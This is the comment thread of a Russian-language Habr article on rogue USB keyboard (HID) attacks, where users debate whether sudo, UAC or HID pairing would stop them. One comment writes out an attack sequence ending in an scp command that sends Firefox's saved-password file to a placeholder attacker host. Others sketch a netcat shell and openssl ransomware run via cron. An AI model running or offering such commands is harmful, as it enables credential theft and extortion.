Как стать автором
Поиск
Написать публикацию
Обновить

Комментарии 14

Лучше бы не блокнот показали, а выполнение скрипта.
Всего голосов 2: ↑1 и ↓1 0
там особо и нечего то смотреть. висит микроокно cmd несколько секунд. потом пропадает…
Всего голосов 2: ↑2 и ↓0 +2
Результат. Антивирус убить, или еще что-нибудь.
Всего голосов 2: ↑1 и ↓1 0
С ужасом представляю себе, как эта штука запускается под приличной ОС. Ни cmd.exe, ни павершелла. Судо требует либо пальчик на фингерпринт-ридере, либо пароль…
Комментарий пока не оценивали 0
UAC тоже может спросить пароль
Всего голосов 1: ↑1 и ↓0 +1
Microsoft Way: 2 Пользователя. 1 — Админ, 2- Обычный юзер.
Работаем под 2, при необходимости повышения привелегий вводим лог анд пасс от 1. Необходимое приложение запустится от пользователя 1.
Комментарий пока не оценивали 0
Вот только следуют этому простому правилу очень мало пользователей… «Зачем лишняя суета, какие то пароли. Все равно компьютером только я и близкие друзья пользуются»
Комментарий пока не оценивали 0
Alt+F2
xterm
scp .mozilla/firefox/*/signons.sqlite bad.guy@somewhere:
Всего голосов 2: ↑2 и ↓0 +2
А в ответ он пальчик просит для ключа… Вот незадача.
Комментарий пока не оценивали 0
На что именно? scp? Ок, по ftp.
Всего голосов 2: ↑2 и ↓0 +2
А вот это да, проблема. За вычетом того, что у меня на машине xterm'а нет, а так да, проблема.

А, вспомнил. Кейринг-то, в т.ч. и у iceweasel, тоже зашифрован. Так что нет. Хотя документы упереть, да, можно. И шелл запустить из чего-то типа nc в режиме listen тоже можно.
Комментарий пока не оценивали 0
А можно ещё документы зашифровать каким-нибудь openssl и после
xdg-open badguy/hello
Где будет написано «заплатите мне 1000$, чтоб я вам выслал ключ дешифровки»

И можно даже не сразу это сделать, а поставить задачу в крон.

USB HID реально большая дыра, даже на правильных ОС.

В идеале должен быть pairing. ОС при обнаружении новой клавы показывает окошко с последовательностью символов, которую нужно нажать, чтоб клава считалась доверенной.
Всего голосов 1: ↑1 и ↓0 +1
Ну вот этим современного человека не устрашить. Я сейчас прикинул — если я лишусь ~ на ноуте, то там будет ошмёток презентации, сейв от игрушки, столь любимые конфиги к софту — … и всё. Всё остальное на серверах. Либо СЭД, либо гиты, либо прочие корпоративные системы.

ЗЫ А параноикам нужно просто разрешить HID'ы в X-сервере по списку, а не все подряд.
Всего голосов 1: ↑1 и ↓0 +1
для повышения привилегий в windows тоже требуется пароль.
Всего голосов 1: ↑1 и ↓0 +1
Зарегистрируйтесь на Хабре , чтобы оставить комментарий

Публикации

Разблокировать темную тему

Истории

Ваш аккаунт

Разделы

Информация

Услуги

Техническая поддержка
© 2006–2024, Habr